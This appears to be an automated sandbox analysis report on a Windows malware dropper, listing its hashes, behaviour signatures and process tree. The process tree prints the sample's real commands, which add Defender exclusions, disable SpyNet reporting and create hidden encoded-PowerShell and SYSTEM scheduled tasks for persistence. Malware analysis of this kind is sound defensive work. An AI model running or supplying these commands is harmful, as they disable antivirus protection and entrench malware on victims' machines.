Analysis
-
max time kernel
127s -
max time network
131s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
27-11-2022 20:00
Static task
static1
General
-
Target
d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c.exe
-
Size
7.3MB
-
MD5
96c8cf366a208bb8c718c8adb8fe8f09
-
SHA1
523c74fd08b2b48f7d9e2f1ded880b3395b7fd09
-
SHA256
d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c
-
SHA512
a2bb85b49fd64e3b5d372f1f23c1826233e6ceddf66ec1ea6eae959888e9471de4e602638df1936e7bf69687bf0ee164fb7b94e40c15edce2b31dd47c0d3d5b1
-
SSDEEP
196608:91O7zHr+QgWi5Hv2fnrwPoi3mzXM0GWZ61mLPwR:3O7/+fWQP2TwPoGGZY1DR
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 20 4372 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 5004 Install.exe 1980 Install.exe 1468 rhTtdvi.exe 212 YTtSAKT.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Control Panel\International\Geo\Nation YTtSAKT.exe -
Loads dropped DLL 1 IoCs
pid Process 4372 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hipilpceecbhfpflneijogboalilnfjp\1.3.3_0\manifest.json YTtSAKT.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini YTtSAKT.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol rhTtdvi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 YTtSAKT.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA YTtSAKT.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_DD5E18651A85E635F184F73BE6D3DB70 YTtSAKT.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini rhTtdvi.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content YTtSAKT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 YTtSAKT.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\qTJuYfusUOEU2\EfmXoJhLKdNKH.dll YTtSAKT.exe File created C:\Program Files (x86)\JQSUAsxhPrkpC\UArEXlT.xml YTtSAKT.exe File created C:\Program Files (x86)\RcLzQsxdNdUn\dWSZrPF.dll YTtSAKT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi YTtSAKT.exe File created C:\Program Files\Mozilla Firefox\browser\features\{DBDE73E2-BC5F-41AD-9E14-0105D4813C2F}.xpi YTtSAKT.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak YTtSAKT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak YTtSAKT.exe File created C:\Program Files (x86)\hlZelPwcU\BRxdtkf.xml YTtSAKT.exe File created C:\Program Files (x86)\NzXptEldKlmGfUJVpfR\KBgppen.dll YTtSAKT.exe File created C:\Program Files (x86)\JQSUAsxhPrkpC\YkyABZI.dll YTtSAKT.exe File created C:\Program Files (x86)\hlZelPwcU\fXJLdK.dll YTtSAKT.exe File created C:\Program Files (x86)\qTJuYfusUOEU2\DTMUeYC.xml YTtSAKT.exe File created C:\Program Files (x86)\NzXptEldKlmGfUJVpfR\XhrwEst.xml YTtSAKT.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja YTtSAKT.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\ypViPfUThfaozTSkl.job schtasks.exe File created C:\Windows\Tasks\rccJDHdVfEiTauB.job schtasks.exe File created C:\Windows\Tasks\vCaIXqBQfpdmnpiwp.job schtasks.exe File created C:\Windows\Tasks\bdcFCqLpfQmIysFLcB.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1872 schtasks.exe 4604 schtasks.exe 3620 schtasks.exe 1540 schtasks.exe 4460 schtasks.exe 616 schtasks.exe 4528 schtasks.exe 4452 schtasks.exe 3720 schtasks.exe 388 schtasks.exe 1276 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer YTtSAKT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" YTtSAKT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 YTtSAKT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" YTtSAKT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket YTtSAKT.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b79df8d1-0000-0000-0000-d01200000000}\NukeOnDelete = "0" YTtSAKT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{b79df8d1-0000-0000-0000-d01200000000} YTtSAKT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix YTtSAKT.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" YTtSAKT.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache YTtSAKT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" YTtSAKT.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 920 powershell.EXE 920 powershell.EXE 920 powershell.EXE 1156 powershell.exe 1156 powershell.exe 1156 powershell.exe 4068 powershell.exe 4068 powershell.exe 4068 powershell.exe 3144 powershell.EXE 3144 powershell.EXE 3144 powershell.EXE 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe 212 YTtSAKT.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 920 powershell.EXE Token: SeDebugPrivilege 1156 powershell.exe Token: SeDebugPrivilege 4068 powershell.exe Token: SeDebugPrivilege 3144 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2652 wrote to memory of 5004 2652 d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c.exe 66 PID 2652 wrote to memory of 5004 2652 d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c.exe 66 PID 2652 wrote to memory of 5004 2652 d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c.exe 66 PID 5004 wrote to memory of 1980 5004 Install.exe 67 PID 5004 wrote to memory of 1980 5004 Install.exe 67 PID 5004 wrote to memory of 1980 5004 Install.exe 67 PID 1980 wrote to memory of 4296 1980 Install.exe 69 PID 1980 wrote to memory of 4296 1980 Install.exe 69 PID 1980 wrote to memory of 4296 1980 Install.exe 69 PID 1980 wrote to memory of 2308 1980 Install.exe 70 PID 1980 wrote to memory of 2308 1980 Install.exe 70 PID 1980 wrote to memory of 2308 1980 Install.exe 70 PID 4296 wrote to memory of 2828 4296 forfiles.exe 74 PID 4296 wrote to memory of 2828 4296 forfiles.exe 74 PID 4296 wrote to memory of 2828 4296 forfiles.exe 74 PID 2308 wrote to memory of 4440 2308 forfiles.exe 73 PID 2308 wrote to memory of 4440 2308 forfiles.exe 73 PID 2308 wrote to memory of 4440 2308 forfiles.exe 73 PID 4440 wrote to memory of 4808 4440 cmd.exe 76 PID 4440 wrote to memory of 4808 4440 cmd.exe 76 PID 4440 wrote to memory of 4808 4440 cmd.exe 76 PID 2828 wrote to memory of 4816 2828 cmd.exe 75 PID 2828 wrote to memory of 4816 2828 cmd.exe 75 PID 2828 wrote to memory of 4816 2828 cmd.exe 75 PID 2828 wrote to memory of 4620 2828 cmd.exe 78 PID 2828 wrote to memory of 4620 2828 cmd.exe 78 PID 2828 wrote to memory of 4620 2828 cmd.exe 78 PID 4440 wrote to memory of 4732 4440 cmd.exe 77 PID 4440 wrote to memory of 4732 4440 cmd.exe 77 PID 4440 wrote to memory of 4732 4440 cmd.exe 77 PID 1980 wrote to memory of 4460 1980 Install.exe 79 PID 1980 wrote to memory of 4460 1980 Install.exe 79 PID 1980 wrote to memory of 4460 1980 Install.exe 79 PID 1980 wrote to memory of 4896 1980 Install.exe 81 PID 1980 wrote to memory of 4896 1980 Install.exe 81 PID 1980 wrote to memory of 4896 1980 Install.exe 81 PID 920 wrote to memory of 3492 920 powershell.EXE 85 PID 920 wrote to memory of 3492 920 powershell.EXE 85 PID 1980 wrote to memory of 2244 1980 Install.exe 90 PID 1980 wrote to memory of 2244 1980 Install.exe 90 PID 1980 wrote to memory of 2244 1980 Install.exe 90 PID 1980 wrote to memory of 1872 1980 Install.exe 92 PID 1980 wrote to memory of 1872 1980 Install.exe 92 PID 1980 wrote to memory of 1872 1980 Install.exe 92 PID 1468 wrote to memory of 1156 1468 rhTtdvi.exe 95 PID 1468 wrote to memory of 1156 1468 rhTtdvi.exe 95 PID 1468 wrote to memory of 1156 1468 rhTtdvi.exe 95 PID 1156 wrote to memory of 4848 1156 powershell.exe 97 PID 1156 wrote to memory of 4848 1156 powershell.exe 97 PID 1156 wrote to memory of 4848 1156 powershell.exe 97 PID 4848 wrote to memory of 4656 4848 cmd.exe 98 PID 4848 wrote to memory of 4656 4848 cmd.exe 98 PID 4848 wrote to memory of 4656 4848 cmd.exe 98 PID 1156 wrote to memory of 4876 1156 powershell.exe 99 PID 1156 wrote to memory of 4876 1156 powershell.exe 99 PID 1156 wrote to memory of 4876 1156 powershell.exe 99 PID 1156 wrote to memory of 3808 1156 powershell.exe 100 PID 1156 wrote to memory of 3808 1156 powershell.exe 100 PID 1156 wrote to memory of 3808 1156 powershell.exe 100 PID 1156 wrote to memory of 4440 1156 powershell.exe 101 PID 1156 wrote to memory of 4440 1156 powershell.exe 101 PID 1156 wrote to memory of 4440 1156 powershell.exe 101 PID 1156 wrote to memory of 4292 1156 powershell.exe 102 PID 1156 wrote to memory of 4292 1156 powershell.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c.exe"C:\Users\Admin\AppData\Local\Temp\d099ddbc7cff4f0df2958dbdb0566010bbf399a2f66688fe676d7996e327a97c.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Admin\AppData\Local\Temp\7zSA6A5.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Users\Admin\AppData\Local\Temp\7zSBD1B.tmp\Install.exe.\Install.exe /S /site_id "757674"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1980 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4296 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:2828 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4816
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4620
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4440 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:4808
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:4732
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gshaoPbnf" /SC once /ST 10:39:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:4460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gshaoPbnf"4⤵PID:4896
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gshaoPbnf"4⤵PID:2244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bdcFCqLpfQmIysFLcB" /SC once /ST 20:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC\psTRjjIMsrlHlrG\rhTtdvi.exe\" vD /site_id 757674 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1872
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:920 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:3492
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:2764
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2776
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2096
-
C:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC\psTRjjIMsrlHlrG\rhTtdvi.exeC:\Users\Admin\AppData\Local\Temp\iRdPSefGAWCkAhovC\psTRjjIMsrlHlrG\rhTtdvi.exe vD /site_id 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:1468 -
